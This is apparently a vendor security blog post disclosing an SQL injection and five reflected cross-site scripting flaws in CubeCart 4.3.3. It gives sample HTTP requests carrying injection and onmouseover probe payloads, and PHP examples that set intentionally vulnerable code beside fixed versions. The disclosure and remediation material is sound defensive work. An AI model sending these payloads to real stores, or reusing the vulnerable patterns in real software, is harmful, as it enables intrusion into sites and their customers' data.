We are continuing with the list of security vulnerabilities found in a
number of web applications while testing our latest version of Acunetix
WVS v7. In this blog post, we will look into the details of a number of
security problems discovered by Acunetix WVS in CubeCart.
"CubeCart is a fully featured ecommerce shopping cart solution used by
over a million store owners around the world."
The following web vulnerabilities were found in CubeCart version 4.3.3:
1. SQL injection in "/cubecart_4/index.php", parameter "searchStr".
2. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "amount".
3. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "cartId".
4. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "email".
5. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "transId".
6. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "transStatus".
Technical details about each web vulnerability are below:
1. SQL injection in "/cubecart_4/index.php", parameter "searchStr".
Additional details:
SQL query:
SELECT id FROM cube_CubeCart_search WHERE searchstr='''
The single quote sent in searchStr is concatenated straight into the string literal, which leaves the query above with an unterminated string and makes the database reject it.
Sample HTTP Request:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
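The following is an added example and not CubeCart's own code: it shows the search lookup that the failing query above implies, first with the value spliced into the SQL text (the assumed vulnerable pattern, since the page does not show CubeCart's source) and then with a bound parameter. The table and column names are taken from the query on the page; the in-memory SQLite database and its two rows are constructed so the script runs offline.

```php
<?php
// Added example, not CubeCart's own code. Table and column names come from
// the advisory's query; the SQLite database and its rows are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cube_CubeCart_search (id INTEGER PRIMARY KEY, searchstr TEXT)');
$db->exec("INSERT INTO cube_CubeCart_search (searchstr) VALUES ('shoes'), ('hats')");

// Assumed vulnerable pattern: the raw searchStr value is spliced into the SQL
// text. A single quote in the input closes the literal early, which is what
// turns the statement into the "searchstr='''" shown in the advisory.
function lookupConcatenated(PDO $db, string $searchStr): array
{
    $sql = "SELECT id FROM cube_CubeCart_search WHERE searchstr='" . $searchStr . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the value is bound as a parameter, so the query shape is
// fixed before any user input is seen and a quote is plain data.
function lookupPrepared(PDO $db, string $searchStr): array
{
    $stmt = $db->prepare('SELECT id FROM cube_CubeCart_search WHERE searchstr = :s');
    $stmt->execute([':s' => $searchStr]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$probe = "'";   // the searchStr value from the advisory's sample request

try {
    lookupConcatenated($db, $probe);
    echo "concatenated query ran without error (not expected)\n";
} catch (PDOException $e) {
    // The database rejects the unterminated string literal. An error-based
    // scanner check looks for exactly this kind of response.
    echo "concatenated query rejected: " . $e->getMessage() . "\n";
}

// The bound version searches for a literal quote character and simply finds
// no matching row, while an ordinary search term still works.
echo "prepared, probe:   " . count(lookupPrepared($db, $probe)) . " row(s)\n";
echo "prepared, 'shoes': " . count(lookupPrepared($db, 'shoes')) . " row(s)\n";
```

The point to take from the script is that the fix is structural: with a prepared statement the database parses the query before the value arrives, so there is no character the caller has to remember to escape.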
2. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "amount".
Attack details:
URL encoded GET input amount was set to " onmouseover=prompt(949088) bad="
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=%22%20onmouseover%3dprompt%28949088%29%20bad%3d%22&cartId=&email=&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
3. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "cartId".
Attack details:
URL encoded GET input cartId was set to " onmouseover=prompt(932890) bad="
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=%22%20onmouseover%3dprompt%28934178%29%20bad%3d%22&email=&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
4. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "email".
Attack details:
URL encoded GET input email was set to " onmouseover=prompt(908306) bad="
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=%22%20onmouseover%3dprompt%28908306%29%20bad%3d%22&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
5. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "transId".
Attack details:
URL encoded GET input transId was set to " onmouseover=prompt(998313) bad="
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=%22%20onmouseover%3dprompt%28998313%29%20bad%3d%22&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
6. Cross-site Scripting vulnerability in "/cubecart_4/modules/gateway/WorldPay/return.php", parameter "transStatus".
Attack details:
URL encoded GET input transStatus was set to " onmouseover=prompt(923101) bad="
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=&transStatus=%22%20onmouseover%3dprompt%28923101%29%20bad%3d%22 HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
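Items 2 through 6 share one root cause: a query value is written into a double-quoted attribute without encoding. The following added example, which is not CubeCart's return.php, renders the five WorldPay callback parameters named above into hidden form inputs the unescaped way (the assumed vulnerable pattern) and the entity-encoded way, then checks each rendering the way a browser would parse it. The form markup and the request values are constructed for illustration; only the parameter names and the item 2 probe value come from the advisory.

```php
<?php
// Added example, not CubeCart's return.php. Parameter names are from the
// advisory; the hidden-input markup and the request values are constructed.

const WORLDPAY_FIELDS = ['amount', 'cartId', 'email', 'transId', 'transStatus'];

// Assumed vulnerable pattern: the raw query value lands inside a double-quoted
// attribute. A double quote in the value ends the attribute, and whatever
// follows is parsed as further attributes of the same tag.
function renderUnescaped(array $get): string
{
    $html = '';
    foreach (WORLDPAY_FIELDS as $name) {
        $html .= '<input type="hidden" name="' . $name . '" value="' . ($get[$name] ?? '') . '">' . "\n";
    }
    return $html;
}

// Hardened form: each value is entity-encoded for the attribute context.
// ENT_QUOTES encodes both quote characters, ENT_SUBSTITUTE stops an invalid
// byte sequence from collapsing the whole value to an empty string, and the
// explicit charset keeps the encoder's view of the bytes aligned with the page.
function renderEscaped(array $get): string
{
    $html = '';
    foreach (WORLDPAY_FIELDS as $name) {
        $safe = htmlspecialchars((string) ($get[$name] ?? ''), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $html .= '<input type="hidden" name="' . $name . '" value="' . $safe . '">' . "\n";
    }
    return $html;
}

// Check: parse the markup with an HTML parser and confirm every input carries
// only the three attributes the template wrote. Any injected attribute,
// such as an onmouseover handler, fails the check.
function inputsCarryOnlyTemplateAttributes(string $html): bool
{
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>', LIBXML_NOERROR | LIBXML_NOWARNING);
    foreach ($doc->getElementsByTagName('input') as $input) {
        foreach ($input->attributes as $attr) {
            if (!in_array($attr->name, ['type', 'name', 'value'], true)) {
                return false;
            }
        }
    }
    return true;
}

// Constructed request: the item 2 probe value in amount, plausible values elsewhere.
$get = [
    'amount'      => '" onmouseover=prompt(949088) bad="',
    'cartId'      => '1234',
    'email'       => 'buyer@example.com',
    'transId'     => '98765',
    'transStatus' => 'Y',
];

echo 'unescaped rendering passes the attribute check: ';
var_dump(inputsCarryOnlyTemplateAttributes(renderUnescaped($get)));
echo 'escaped rendering passes the attribute check:   ';
var_dump(inputsCarryOnlyTemplateAttributes(renderEscaped($get)));
echo renderEscaped($get);
```

Running it shows the unescaped rendering failing the check, because the parser sees the probe's onmouseover as a real attribute of the input tag, while the escaped rendering passes, since the quote is now the entity &quot; and the whole probe stays inside the value. The check itself is also a reasonable unit test to keep around for any template that writes request data into attributes.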
These vulnerabilities were reported to the CubeCart team on 22/7/2010
via the support system on their website, and they were fixed in the latest
version of CubeCart. If you are using CubeCart, download the latest
version from their website.
--
Bogdan Calin - bogdan [at] acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
Follow us on Twitter - http://www.twitter.com/acunetix